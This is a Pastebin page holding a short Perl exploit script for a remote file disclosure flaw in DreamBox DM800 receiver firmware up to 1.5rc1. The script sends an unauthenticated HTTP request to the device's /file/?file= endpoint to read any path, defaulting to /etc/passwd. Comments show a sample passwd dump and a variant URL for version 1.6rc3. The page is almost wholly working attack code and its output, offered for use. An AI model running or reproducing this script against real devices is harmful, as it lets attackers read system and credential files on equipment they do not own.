API tools faq
paste
Advertisement
hackerscommunity

DreamBox DM800 1.5rc1 'file' remote file disclosure exploit

hackerscommunity
Jul 11th, 2015
424
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 2.14 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/perl
  2. #  DreamBox DM800 <= 1.5rc1 Remote File Disclosure Exploit
  3. #
  4. #  Author: Todor Donev
  5. #  Email: todor.donev@@gmail.com
  6. #  Type: Hardware
  7. #  Vuln Type: Remote
  8. #####
  9. #  Product summary: DreamBox DM800 is Powerful receiver
  10. #  for digital TV and Radio programs based on Linux.
  11. #  Product web page: http://www.dream-multimedia-tv.de
  12. #####
  13. # playground$ perl dreambox.pl target /etc/passwd
  14. # [+] DreamBox DM800 <= 1.5rc1 Remote File Disclosure Exploit
  15. #
  16. # root:<CENSORED>:0:0:root:/home/root:/bin/sh
  17. # daemon:*:1:1:daemon:/usr/sbin:/bin/sh
  18. # bin:*:2:2:bin:/bin:/bin/sh
  19. # sys:*:3:3:sys:/dev:/bin/sh
  20. # sync:*:4:65534:sync:/bin:/bin/sync
  21. # games:*:5:60:games:/usr/games:/bin/sh
  22. # man:*:6:12:man:/var/cache/man:/bin/sh
  23. # lp:*:7:7:lp:/var/spool/lpd:/bin/sh
  24. # mail:*:8:8:mail:/var/mail:/bin/sh
  25. # news:*:9:9:news:/var/spool/news:/bin/sh
  26. # uucp:*:10:10:uucp:/var/spool/uucp:/bin/sh
  27. # proxy:*:13:13:proxy:/bin:/bin/sh
  28. # www-data:*:33:33:www-data:/var/www:/bin/sh
  29. # backup:*:34:34:backup:/var/backups:/bin/sh
  30. # list:*:38:38:Mailing List Manager:/var/list:/bin/sh
  31. # irc:*:39:39:ircd:/var/run/ircd:/bin/sh
  32. # gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
  33. # nobody:*:65534:65534:nobody:/nonexistent:/bin/sh
  34. # avahi:x:500:64002:Avahi:/var/run/avahi-daemon:/bin/sh
  35. # ftp:x:501:64003:Linux User,,,:/var/tmp/ftp:/bin/false
  36. # gbox:<CENSORED>:0:0::/:/bin/sh
  37. #
  38. # playground$
  39. #####
  40. #  Thanks to all my friends and special to the best Tsvetelina Emirska,
  41. #  that support and respect me !! =)
  42. #####
  43. #
  44. #  http://www.ethical-hacker.org/
  45. #  https://www.facebook.com/ethicalhackerorg
  46. #
  47. use LWP::Simple;
  48. print "[+] DreamBox DM800 <= 1.5rc1 Remote File Disclosure\n";
  49. $host = $ARGV[0];
  50. $d = $ARGV[1];
  51. if(! $ARGV[0]) {
  52. print "[!] usg: perl dreambox.pl <host> </path/file>\n";
  53. exit;
  54. }
  55. if(! $ARGV[1]) {
  56. $d = "/etc/passwd";
  57. }
  58. ## Edit here for exploitng DreamBox DM800 <= 1.6rc3
  59. # my $result = get("http://$host/file?file=$d");
  60. ## Greetings for ShellVision who found this bug in version 1.6rc3
  61. my $result = get("http://$host/file/?file=$d");
  62. if (defined $result) {
  63. print "\n$result";
  64. }
  65. else {
  66. print "[-] Not vuln.. =(";
  67. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!